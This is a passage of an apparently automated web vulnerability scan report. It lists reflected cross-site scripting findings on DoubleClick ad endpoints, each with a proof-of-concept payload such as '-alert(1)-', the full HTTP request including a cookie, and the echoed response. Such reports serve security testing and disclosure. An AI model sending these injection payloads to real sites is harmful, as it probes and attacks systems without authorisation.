Path:   /adj/N553.mediamath/B5123370.3

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9edc"-alert(1)-"8bb572df34f was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=109685&mt_adid=70f9edc"-alert(1)-"8bb572df34f&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=58000334961178483? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_728_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Mar 2011 01:49:16 GMT
Vary: Accept-Encoding
Expires: Mon, 07 Mar 2011 01:49:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6999

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
click%3Bh%3Dv8/3ac3/f/a6/%2a/k%3B235630582%3B0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=109685&mt_adid=70f9edc"-alert(1)-"8bb572df34f&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26selleracctnbr%3
...[SNIP]...

1.18. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_adid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.3

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f1b6'-alert(1)-'199859732fe was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=109685&mt_adid=704f1b6'-alert(1)-'199859732fe&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=58000334961178483? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_728_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Mar 2011 01:49:20 GMT
Vary: Accept-Encoding
Expires: Mon, 07 Mar 2011 01:49:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6999

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
click%3Bh%3Dv8/3ac3/f/a6/%2a/k%3B235630582%3B0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=109685&mt_adid=704f1b6'-alert(1)-'199859732fe&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26selleracctnbr%3
...[SNIP]...

1.19. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.3

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1003"-alert(1)-"71bfd521409 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=109685f1003"-alert(1)-"71bfd521409&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=58000334961178483? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_728_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Mar 2011 01:48:33 GMT
Vary: Accept-Encoding
Expires: Mon, 07 Mar 2011 01:48:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6999

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
eclick.net/click%3Bh%3Dv8/3ac3/f/a6/%2a/k%3B235630582%3B0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=109685f1003"-alert(1)-"71bfd521409&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26sell
...[SNIP]...

1.20. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.3

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 32e24'-alert(1)-'4a3043c545 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=10968532e24'-alert(1)-'4a3043c545&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=58000334961178483? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_728_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Mar 2011 01:48:37 GMT
Vary: Accept-Encoding
Expires: Mon, 07 Mar 2011 01:48:37 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6995

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
eclick.net/click%3Bh%3Dv8/3ac3/f/a5/%2a/k%3B235630582%3B0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=10968532e24'-alert(1)-'4a3043c545&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26sell
...[SNIP]...

1.21. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_uuid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.3

Issue detail

The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51eaf'-alert(1)-'d7a41afa548 was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=109685&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b51eaf'-alert(1)-'d7a41afa548&redirect=;ord=58000334961178483? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_728_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Mar 2011 01:50:03 GMT
Vary: Accept-Encoding
Expires: Mon, 07 Mar 2011 01:50:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6999

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=109685&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b51eaf'-alert(1)-'d7a41afa548&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26selleracctnbr%3D6430098999I%26source%3Ddisplay_MM\">
...[SNIP]...

1.22. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_uuid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.3

Issue detail

The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f488a"-alert(1)-"6b12f66611a was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=109685&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624bf488a"-alert(1)-"6b12f66611a&redirect=;ord=58000334961178483? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_728_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Mar 2011 01:49:59 GMT
Vary: Accept-Encoding
Expires: Mon, 07 Mar 2011 01:49:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6999

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=109685&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624bf488a"-alert(1)-"6b12f66611a&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26selleracctnbr%3D6430098999I%26source%3Ddisplay_MM");
var fs
...[SNIP]...

1.23. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.3

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73a0d'-alert(1)-'16687507dee was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=109685&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=73a0d'-alert(1)-'16687507dee HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_728_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6999
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 07 Mar 2011 01:50:46 GMT
Expires: Mon, 07 Mar 2011 01:50:46 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=109685&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=73a0d'-alert(1)-'16687507deehttps%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26selleracctnbr%3D6430098999I%26source%3Ddisplay_MM\">
...[SNIP]...

1.24. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.3

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f1e2"-alert(1)-"0bc0708a95e was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=109685&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=6f1e2"-alert(1)-"0bc0708a95e HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_728_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6999
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 07 Mar 2011 01:50:42 GMT
Expires: Mon, 07 Mar 2011 01:50:42 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=109685&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=6f1e2"-alert(1)-"0bc0708a95ehttps%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26selleracctnbr%3D6430098999I%26source%3Ddisplay_MM");
var fscUrl = url
...[SNIP]...

1.25. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.3

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70f7f"-alert(1)-"5a9954e2121 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=5800033496117848370f7f"-alert(1)-"5a9954e2121&mt_id=109685&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=58000334961178483? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_728_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Mar 2011 01:48:03 GMT
Vary: Accept-Encoding
Expires: Mon, 07 Mar 2011 01:48:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6999

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
tp://ad.doubleclick.net/click%3Bh%3Dv8/3ac3/f/a6/%2a/k%3B235630582%3B0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=5800033496117848370f7f"-alert(1)-"5a9954e2121&mt_id=109685&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3D
...[SNIP]...

1.26. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.3

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cbe5e'-alert(1)-'0ce86ae9e85 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58000334961178483cbe5e'-alert(1)-'0ce86ae9e85&mt_id=109685&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=58000334961178483? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_728_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Mar 2011 01:48:07 GMT
Vary: Accept-Encoding
Expires: Mon, 07 Mar 2011 01:48:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6999

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
tp://ad.doubleclick.net/click%3Bh%3Dv8/3ac3/f/a6/%2a/k%3B235630582%3B0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58000334961178483cbe5e'-alert(1)-'0ce86ae9e85&mt_id=109685&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3D
...[SNIP]...

1.27. http://ad.doubleclick.net/adj/syn.embarq/footer [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/syn.embarq/footer

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3277a'-alert(1)-'4ce2523eee0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/syn.embarq/footer?3277a'-alert(1)-'4ce2523eee0=1 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 299
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 08 Mar 2011 11:59:49 GMT
Expires: Tue, 08 Mar 2011 11:59:49 GMT
Connection: close

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ac4/0/0/%2a/z;44306;0-0;0;26549892;4307-300/250;0/0/0;;~okv=;3277a'-alert(1)-'4ce2523eee0=1;~aopt=2/0/5c/0;~sscs=%3f"><im
...[SNIP]...

1.28. http://ad.doubleclick.net/adj/test.gmaps/business [dc_ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/test.gmaps/business

Issue detail

The value of the dc_ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cdd04'%3balert(1)//df8038a084e was submitted in the dc_ref parameter. This input was echoed as cdd04';alert(1)//df8038a084e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/test.gmaps/business;dc_ref=cdd04'%3balert(1)//df8038a084e HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://maps.google.com/mapfiles/ads/pp_dfp_ads_20100528.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 321
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 08 Mar 2011 01:23:42 GMT
Expires: Tue, 08 Mar 2011 01:23:42 GMT

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3ac4/0/0/%2a/z;44306;0-0;0;46537204;4307-300/250;0/0/0;;~okv=;dc_ref=cdd04';alert(1)//df8038a084e;bsg=3005;bsg=3017;;~aopt=2/0/ff/0;~sscs=%3f">
...[SNIP]...

1.29. http://ad.doubleclick.net/adj/test.gmaps/business [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/test.gmaps/business

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 25dd4'-alert(1)-'524a5a4183f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/test.gmaps/business?25dd4'-alert(1)-'524a5a4183f=1 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb;

Response

HTTP/1.1 200 OK
